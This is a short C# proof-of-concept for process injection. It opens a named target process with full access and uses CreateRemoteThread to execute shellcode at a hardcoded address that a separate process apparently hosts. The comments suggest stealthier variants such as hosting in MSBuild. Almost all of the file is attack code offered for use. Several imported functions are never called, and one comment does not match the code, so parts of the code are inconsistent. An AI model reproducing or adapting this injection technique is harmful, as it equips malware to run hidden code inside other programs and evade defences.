// There are a number of ways to do this, In this example, you can host shellcode in one process.
// Then call in and exeucte it from another, this is the most basic.
// Better ideas are things like hostsing in MSbuild, Then executing in another, CreateRemoteThread, etc..
// Have fun, the basic idea here is modularity, and splitting 

using System;
using System.Diagnostics;
using System.Runtime.InteropServices;

// Code Adapation Here
// https://gist.github.com/andreafortuna/b8cdf82932d11baaa779a5fbeb77526a/raw/db9edeec255bd98421fa562786f6f08206710c45/


	public class InjectionPoC
	{
		
		[DllImport("kernel32.dll")]
	    public static extern IntPtr OpenProcess(int dwDesiredAccess, bool bInheritHandle, int dwProcessId);
	
	    [DllImport("kernel32.dll", CharSet = CharSet.Auto)]
	    public static extern IntPtr GetModuleHandle(string lpModuleName);
	
	    [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
	    static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
	
	    [DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
	    static extern IntPtr VirtualAllocEx(IntPtr hProcess, IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);
	
	    [DllImport("kernel32.dll", SetLastError = true)]
	    static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out UIntPtr lpNumberOfBytesWritten);
	
	    [DllImport("kernel32.dll")]
	    static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);

		public static void Main(string[] args)
		{			
			if (args.Length == 0)
			{
			    System.Console.WriteLine("Please enter process name...");
			    System.Console.WriteLine("Usage: CodeInjectionPoC [process name]");
			    return;
			}

			Console.WriteLine("Start injection...");
			
			Process targetProcess;
			
			try {
				targetProcess = Process.GetProcessesByName(args[0])[0];	
			}
			catch {
				System.Console.WriteLine("Process " + args[0] + " not found!");
				return;
			}
			
			
			// Get process handler
			IntPtr process_handle = OpenProcess(0x1F0FFF, false, targetProcess.Id);
			
			IntPtr memory_allocation_variable =  new IntPtr(0x197C8B50000);
			// Create a thread that will call LoadLibraryA with allocMemAddress as argument
			if (CreateRemoteThread(process_handle, IntPtr.Zero, 0, memory_allocation_variable , IntPtr.Zero, 0,IntPtr.Zero) != IntPtr.Zero) {
				Console.Write("Injection done!");	
			} else {
				Console.Write("Injection failed!");	
			}				
		}
	}